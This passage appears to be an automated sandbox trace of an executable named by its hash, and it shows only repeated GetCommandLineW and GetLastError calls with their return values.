returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.948] GetLastError () returned 0x0 [0078.948] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.949] GetLastError () returned 0x0 [0078.949] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.950] GetLastError () returned 0x0 [0078.950] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.951] GetLastError () returned 0x0 [0078.951] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.952] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.952] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.953] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.953] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.954] GetLastError () returned 0x0 [0078.954] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.955] GetLastError () returned 0x0 [0078.955] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0078.956] GetLastError () returned 0x0 [0078.956] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " 